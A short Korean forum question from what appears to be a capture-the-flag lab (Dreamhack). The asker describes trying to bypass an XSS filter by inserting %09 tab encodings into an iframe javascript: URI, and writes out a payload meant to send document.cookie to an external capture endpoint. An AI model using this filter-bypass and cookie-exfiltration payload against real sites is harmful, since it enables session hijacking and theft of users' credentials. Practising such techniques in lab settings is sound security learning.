완료됨
우회방법과 cookie 질문드립니다...
iframe src="javascript" 구문에 %09 URL 인코딩을 섞어서 필터링을 우회하고자 하는데요,
iframe src="javascri%09pt:locatio%09n.href=%27~~~.dreamhack.games/?memo=%27+docu%09ment.gookie;">
구문을 전송하면 vuln 페이지에서는 memo= 빈칸이 requestbin에 전송되고
flag 페이지에선 아무것도 전송되지 않습니다...
<iframe srcdoc 로는 javascript:~~ 구문이 안먹는것같고,, 어떻게 우회해야될지 모르겟네요 ㅠㅠ
#web
작성자 정보